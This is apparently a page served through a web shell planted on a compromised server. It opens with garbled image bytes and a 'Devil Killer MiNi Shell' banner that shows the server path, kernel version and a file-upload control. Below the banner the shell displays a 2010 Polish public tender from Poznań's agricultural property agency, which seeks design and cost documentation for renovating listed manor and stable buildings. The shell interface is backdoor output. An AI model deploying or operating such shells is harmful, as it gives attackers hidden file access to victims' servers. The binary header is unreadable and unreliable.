JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100430/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100430/104119-N-2010.html

<p class="kh_header"><b>Poznań: Opracowanie dokumentacji projektowo-kosztorysowych wraz z uzyskaniem stosownych ostatecznych pozwoleń i uzgodnień wymaganych
obowiązującymi przepisami prawa</b><br>
<b>Numer ogłoszenia: 104119 - 2010; data zamieszczenia: 30.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Agencja Nieruchomości Rolnych Oddział Terenowy , ul. Fredry 12, 61-701 Poznań, woj. wielkopolskie, tel. 061 8560681, faks 061 8515092.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.anr.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentacji projektowo-kosztorysowych wraz z uzyskaniem stosownych ostatecznych pozwoleń i uzgodnień wymaganych
obowiązującymi przepisami prawa.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Zamówienie jest podzielone na 4 części. Wykonawca może złożyć ofertę na jedną lub więcej części. 
2. Przedmiotem zamówienia jest:

Część I:
Sporządzenie dokumentacji projektowo-kosztorysowej na wykonanie robót budowlanych przy zabytku tj. stajni koni wyjazdowych z budynkiem bramnym znajdującym się na działce o numerze ewidencyjnym  36/4  w miejscowości Oporowo, gmina Ostroróg w zakresie: 
- remont drewnianej konstrukcji więźby dachowej,
- wykonanie nowego pokrycia dachowego z papy,
- naprawa i uzupełnienie murów zewnętrznych i wewnętrznych wraz z wykonaniem napraw  
  nadproży i pęknięć ścian.
- wykonanie i założenie opierzeń z blachy, założenie rynien i rur spustowych oraz 
  odprowadzenie wody od budynku.
- założenie instalacji odgromowej
- zamknięcie wszystkich otworów okiennych i drzwiowych. 
Przed przystąpieniem do sporządzenia dokumentacji wykonawca powinien skonsultować zakres projektu z Wojewódzkim Konserwatorem Zabytków.

Część II:
Przedmiotem zamówienia jest opracowanie  dokumentacji projektowo-kosztorysowej  na remont budynku oficyny zachodniej oraz budynku oficyny wschodniej wpisanych do rejestru zabytków pod nr 148/A z 15.07.1968 r., położonych na terenie zespołu dworskiego w Łomnicy, gmina Zbąszyń, powiat Nowotomyski, zlokalizowanych na działce nr 21/9, z uwzględnieniem następującego zakresu robót:
   - remont stropów, remont więźby dachowej, wymiana pokrycia dachowego, wykonanie opierzeń blacharskich, remont tynków elewacji, remont (zabezpieczenie) konstrukcji ścian, wymiana stolarki okiennej i drzwiowej.
   
Projekt wymaga uzgodnienia na etapie przedprojektowym i akceptacji ze stanowiska konserwatorskiego  opracowanej dokumentacji z Wojewódzkim Urzędem Ochrony Zabytków w Poznaniu, ul. Gołębia 2, 61-834 Poznań.

Część III:
Przedmiotem zamówienia jest opracowanie  dokumentacji projektowo-kosztorysowej  na remont budynku stajni koni wjazdowych i powozowni,  budynku oficyny południowej oraz  budynku oficyny północnej wpisanych do rejestru zabytków, wchodzących w skład zespołu pałacowego w Kwilczu  powiat Międzychód, zlokalizowanych na działce nr 72/27, z uwzględnieniem następującego zakresu robót:
* budynek stajni koni wjazdowych i powozowni w Kwilczu - wpisany do rejestru zabytków, nr rej. 2556/A
   - remont stropów, remont więźby dachowej, naprawa pokrycia dachowego, wykonanie opierzeń blacharskich, wykonanie właściwego odprowadzenia wód deszczowych od budynku (rynny i rury spustowe), remont tynków elewacji,
   
Nakaz WUOZ w Poznaniu, ul. Gołębia 2, 61-834 Poznań Nr 2/2009 z dnia 20.07.2009r.

* budynek oficyny południowej w Kwilczu - wpisany do rejestru zabytków, nr rej. 2556/A
   - naprawa i konserwacja drewnianej konstrukcji i drewnianych elementów ozdobnych balkonów wschodniego i północnego, 
   - konserwacja i naprawa deskowania oraz drewnianych elementów przy okapach dachowych w szczytach budynku. 

* budynek oficyny północnej w Kwilczu - wpisany do rejestru zabytków, nr rej. 75/A
   - remont stropów, remont więźby dachowej, naprawa pokrycia dachowego, wykonanie opierzeń blacharskich, wykonanie właściwego odprowadzenia wód deszczowych od budynku (rynny i rury spustowe), instalacja odgromowa.
 
Projekt wymaga uzgodnienia na etapie przed projektowym i akceptacji ze stanowiska konserwatorskiego  opracowanej dokumentacji z Wojewódzkim Urzędem Ochrony Zabytków w Poznaniu, ul. Gołębia 2, 61-834 Poznań.

Część IV:
Wykonanie ekspertyzy budynku młyna uszkodzonego przez pożar oraz budynku łaźni (sąsiednie, przyległego budynku młyna) na który oddziaływał pożar z określeniem uszkodzeń budynków, oceny uszkodzeń i aktualnego stanu technicznego poszczególnych elementów konstrukcyjnych obu budynków, niezbędnych robót do wykonania w celu odtworzenia stanu technicznego pozwalającego na użytkowanie oraz oceny opłacalności odbudowy, remontu lub rozbiórki. Dotyczy obiektu rolnego Jeziorki, Plac Parkowy 2, gmina Stęszew.

3. Wykonawca zobowiązuje się wykonać prace zgodnie z obowiązującymi przepisami ustawy Prawo budowlane i aktami wykonawczymi do niej oraz ustawą Prawo zamówień publicznych. 
4. Dokumentację projektową należy opracować zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 02.09.2004r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz. U. z 16.09.2004r. Nr 202, poz. 2072 z późniejszymi zmianami) zwanym dalej Rozporządzeniem. 
5. W ramach zamówienia Wykonawca wykona w 5 egz : 
- projekty budowlane w zakresie uwzględniającym specyfikę robót budowlanych, 
- projekty wykonawcze w zakresie określonym w § 5 Rozporządzenia 
- przedmiar robót w zakresie o którym mowa w § 6 Rozporządzenia, 
- informację dotyczącą bezpieczeństwa i ochrony zdrowia, 
- specyfikację techniczną wykonania i odbioru robót budowlanych opracowaną zgodnie z Rozporządzeniem - rozdział 3 Rozporządzenia, 
- kosztorys inwestorski sporządzony zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 18.05.2004r. w sprawie określenia metod i podstaw sporządzenia kosztorysu inwestorskiego, obliczenia planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w  programie funkcjonalno-użytkowym (Dz. U. z dnia 08.06.2004r. Nr 130, poz. 1389 z późniejszymi zmianami), z uwzględnieniem kodów CPV - Wspólnego Słownika Zamówień.
6. Strona tytułowa dokumentacji projektowej powinna być oznaczona zgodnie z wytycznymi zawartymi w § 11 Rozporządzenia. 
7. Dokumentację należy opracować po przeprowadzeniu wizji lokalnej z osobą uprawnioną do kontaktu w sprawie przedmiotu zamówienia.
8. Wykonawca zobowiązany jest uzyskać stosowne ostateczne pozwolenia i uzgodnienia wymagane obowiązującymi przepisami prawa, odpowiednio dla części zamówienia, na które składana jest oferta, umożliwiające realizację zadania inwestycyjnego. 
9. Komplet dokumentacji obejmuje także załączoną dokumentację w formie elektronicznej (5 szt.) - płytę CD nagraną - zawierającą projekty budowlane z projektami wykonawczymi, przedmiarami robót, kosztorysami inwestorskimi, specyfikacjami technicznymi wykonania i odbioru robót oraz inne dokumenty stanowiące przedmiot zamówienia. Nagranie musi być w formacie PDF.
10. Wykonawca w ramach zamówienia zobowiązany jest do aktualizacji kosztorysu inwestorskiego (zarówno  w formie papierowej jak i elektronicznej) w okresie 24 miesięcy od dnia odbioru dokumentacji przez zamawiającego.
11. Wykonawca zobowiązuje się wykonać usługę zgodnie z obowiązującymi przepisami prawa.
12. Wszelkie koszty wykonania zamówienia ponosi Wykonawca.
13. Podstawą wystawienia faktury za wykonaną usługę będzie dokonanie odbioru wykonanego dzieła przez osobę odpowiedzialną pod względem merytorycznym za przedmiot zamówienia ze strony zamawiającego. Za odbiór wykonanego dzieła należy rozumieć podpisanie protokołu zdawczo-odbiorczego bez uwag przez Wykonawcę oraz osobę odbierającą dzieło pod względem formalnym ze strony zamawiającego.
14. Za wykonane dzieło w terminie uważa się dostarczenie wykonanie pełnej dokumentacji projektowo-kosztorysowej z ostatecznymi uzgodnieniami i pozwoleniami wymaganymi obowiązującymi przepisami prawa.
15. Wykonawca wyraża zgodę na umieszczenie przedmiotu zamówienia w sieci internet i ewentualne jego powielanie dla potrzeb postępowania prowadzonego przez Zamawiającego w trybie ustawy Prawo zamówień publicznych.
16. Wykonawca zapewnia bezpłatny nadzór autorski nad wykonaną dokumentacją na etapie wykonawstwa prac budowlanych.
17. W formularzu ofertowym Wykonawca wskaże czy powyższe zamówienie wykona sam czy wykonanie zamówienia powierzy podwykonawcom, jeśli tak to w jakiej części..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie wymagane</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie wymagane</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie wymagane</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca dysponuje osobą/ami projektanta posiadającymi uprawnienia budowlane wymagane przepisami ustawy Prawo budowlane w specjalności niezbędnej do wykonania przedmiotu zamówienia w zależności od części zamówienia (I, II, III, IV), na którą wykonawca składa ofertę.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie wymagane</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Na potwierdzenie tego, że Wykonawca spełnia warunki określone w dziale VII pkt. I, Wykonawca zobowiązany jest złożyć oprócz dokumentów wskazanych powyżej pisemne oświadczenie o spełnianiu tych warunków. Odpowiednie oświadczenie znajduje się w Formularzu oferty, który stanowi załącznik nr 1 do SIWZ. Podpisanie formularza oferty równoznaczne jest ze złożeniem oświadczenia o spełnianiu wyżej wspomnianych warunków.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.   Zamawiający przewiduje możliwość wprowadzenia zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy.
2.   Wprowadzone zmiany będą dotyczyć umówionego terminu wykonania zamówienia.
3. Zmiany będące następstwem działania organów administracji w szczególności:
       a) przekroczenie zakreślonych przez prawo terminów wydawania przez organy administracji decyzji, zezwoleń itp.
       b) odmowa wydania przez organy administracji wymaganych decyzji, zezwoleń, uzgodnień na skutek dodatkowych wymagań nałożonych przez te organy,
      c) inne przyczyny zewnętrzne niezależne od zamawiającego i wykonawcy skutkujące niemożliwością uzyskania stosownych decyzji, zezwoleń, uzgodnień itp. 
W przypadku wystąpienia którejkolwiek okoliczności wymienionych w pkt. 3 termin wykonania umowy może ulec odpowiedniemu przedłużeniu o czas niezbędny do zakończenia wykonania jej przedmiotu w sposób należyty, nie dłużej jednak jak o okres trwania tych okoliczności. Ciężar udowodnienia faktu w takim układzie spoczywa na wykonawcy przedmiotowego zamówienia.

4. O wystąpieniu okoliczności mogących wpłynąć na zmianę terminów Wykonawca winien poinformować Zamawiającego pisemnie.

5. Zmiany osobowe:
Zmiana osób, przy pomocy których wykonawca realizuje przedmiot umowy, na inne legitymujące się co najmniej równoważnymi uprawnieniami i kwalifikacjami, o których mowa w ustawie Prawo budowlane lub innych ustawach, a także w SIWZ.
Wykonawca może dokonać zmiany osób przedstawionych w ofercie, jedynie za uprzednią zgodą zamawiającego w przypadkach:       
a)	śmierci, choroby lub innych zdarzeń losowych osób,
b)	nie wywiązywania się osób z obowiązków wynikających z umowy,
c)	rezygnacji tych osób z wykonywania swoich obowiązków.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.anr.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Agencja Nieruchomości Rolnych Oddział Terenowy w Poznaniu, ul. Fredry 12, 61-701 Poznań, pokój 417.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.05.2010 godzina 08:00, miejsce: Agencja Nieruchomości Rolnych Oddział Terenowy w Poznaniu, ul. Fredry 12, 61-701 Poznań, pokój 215.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Opracowanie dokumentacji projektowej-kosztorysowej oraz uzyskanie pozwoleń wynikających z ustawy Prawo budowlane na wykonanie robót budowlanych przy zabytku tj. stajni koni wyjazdowych z budynkiem bramnym znajdującym się w miejscowości Oporowo, Gm. Ostroróg..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sporządzenie dokumentacji projektowo-kosztorysowej na wykonanie robót budowlanych przy zabytku tj. stajni koni wyjazdowych z budynkiem bramnym znajdującym się na działce o numerze ewidencyjnym  36/4  w miejscowości Oporowo, gmina Ostroróg w zakresie: 
- remont drewnianej konstrukcji więźby dachowej,
- wykonanie nowego pokrycia dachowego z papy,
- naprawa i uzupełnienie murów zewnętrznych i wewnętrznych wraz z wykonaniem napraw nadproży i pęknięć ścian.
- wykonanie i założenie opierzeń z blachy, założenie rynien i rur spustowych oraz odprowadzenie wody od budynku.
- założenie instalacji odgromowej
- zamknięcie wszystkich otworów okiennych i drzwiowych. 
Przed przystąpieniem do sporządzenia dokumentacji wykonawca powinien skonsultować  zakres projektu z Wojewódzkim Konserwatorem Zabytków..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 120.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Opracowanie  dokumentacji projektowo-kosztorysowej  na remont budynku oficyny zachodniej oraz budynku oficyny wschodniej wpisanych do rejestru zabytków pod nr 148/A z 15.07.1968 r., położonych na terenie zespołu dworskiego w Łomnicy, gmina Zbąszyń, powiat Nowotomyski, zlokalizowanych na działce nr 21/9..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest opracowanie  dokumentacji projektowo-kosztorysowej  na remont budynku oficyny zachodniej oraz budynku oficyny wschodniej wpisanych do rejestru zabytków pod nr 148/A z 15.07.1968 r., położonych na terenie zespołu dworskiego w Łomnicy, gmina Zbąszyń, powiat Nowotomyski, zlokalizowanych na działce nr 21/9, z uwzględnieniem następującego zakresu robót:
   - remont stropów, remont więźby dachowej, wymiana pokrycia dachowego, wykonanie opierzeń blacharskich, remont tynków elewacji, remont (zabezpieczenie) konstrukcji ścian, wymiana stolarki okiennej i drzwiowej.
   
Projekt wymaga uzgodnienia na etapie przedprojektowym i akceptacji ze stanowiska konserwatorskiego  opracowanej dokumentacji z Wojewódzkim Urzędem Ochrony Zabytków w Poznaniu, ul. Gołębia 2, 61-834 Poznań..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 150.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Opracowanie  dokumentacji projektowo-kosztorysowej  na remont budynku stajni koni wjazdowych i powozowni,  budynku oficyny południowej oraz  budynku oficyny północnej wpisanych do rejestru zabytków, wchodzących w skład zespołu pałacowego w Kwilczu  powiat Międzychód, zlokalizowanych na działce nr 72/27..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest opracowanie  dokumentacji projektowo-kosztorysowej  na remont budynku stajni koni wjazdowych i powozowni,  budynku oficyny południowej oraz  budynku oficyny północnej wpisanych do rejestru zabytków, wchodzących w skład zespołu pałacowego w Kwilczu  powiat Międzychód, zlokalizowanych na działce nr 72/27, z uwzględnieniem następującego zakresu robót:
* budynek stajni koni wjazdowych i powozowni w Kwilczu - wpisany do rejestru zabytków, nr rej. 2556/A
   - remont stropów, remont więźby dachowej, naprawa pokrycia dachowego, wykonanie opierzeń blacharskich, wykonanie właściwego odprowadzenia wód deszczowych od budynku (rynny i rury spustowe), remont tynków elewacji,
   
Nakaz WUOZ w Poznaniu, ul. Gołębia 2, 61-834 Poznań Nr 2/2009 z dnia 20.07.2009r.

* budynek oficyny południowej w Kwilczu - wpisany do rejestru zabytków, nr rej. 2556/A
   - naprawa i konserwacja drewnianej konstrukcji i drewnianych elementów ozdobnych balkonów wschodniego i północnego, 
   - konserwacja i naprawa deskowania oraz drewnianych elementów przy okapach dachowych w szczytach budynku. 

* budynek oficyny północnej w Kwilczu - wpisany do rejestru zabytków, nr rej. 75/A
   - remont stropów, remont więźby dachowej, naprawa pokrycia dachowego, wykonanie opierzeń blacharskich, wykonanie właściwego odprowadzenia wód deszczowych od budynku (rynny i rury spustowe), instalacja odgromowa.
 
Projekt wymaga uzgodnienia na etapie przed projektowym i akceptacji ze stanowiska konserwatorskiego  opracowanej dokumentacji z Wojewódzkim Urzędem Ochrony Zabytków w Poznaniu, ul. Gołębia 2, 61-834 Poznań..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 150.</p></li>
